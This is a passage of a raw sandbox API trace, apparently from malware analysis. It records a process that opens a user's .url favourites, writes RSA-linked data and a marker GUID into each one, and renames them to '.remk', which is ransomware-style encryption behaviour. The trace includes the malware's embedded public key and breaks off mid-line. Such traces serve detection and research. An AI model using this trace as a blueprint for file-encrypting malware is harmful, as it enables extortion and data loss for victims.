hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5b0 [0233.952] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee610 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5e0 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee5c8 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee628 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5c8 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee5c8 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5e0 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5f8 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee628 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.955] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.955] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.955] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.955] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.955] CloseHandle (hObject=0x640) returned 1 [0233.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.957] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.957] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.remk")) returned 1 [0233.959] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0233.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.959] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0233.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.960] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.960] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.963] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.963] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.965] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.965] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.966] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.966] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.966] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.966] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.966] GetLastError () returned 0x0 [0233.966] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.966] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.966] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.966] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.966] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.966] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.967] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.967] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.967] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.967] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.967] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.967] CloseHandle (hObject=0x640) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0233.996] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.remk")) returned 1 [0233.998] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0233.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.998] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0233.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.998] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.999] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.001] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.001] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.003] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0234.003] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.003] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.003] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.003] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.004] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.004] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.004] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.004] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.004] GetLastError () returned 0x0 [0234.004] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.004] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.004] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.004] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.005] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.005] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.005] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.005] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.005] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.005] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.006] CloseHandle (hObject=0x640) returned 1 [0234.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.010] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.remk")) returned 1 [0234.012] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0234.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.012] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0234.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.014] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0234.014] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.017] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.017] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.027] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0234.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.027] lstrlenA (lpString="-----BEGIN PUBLIC 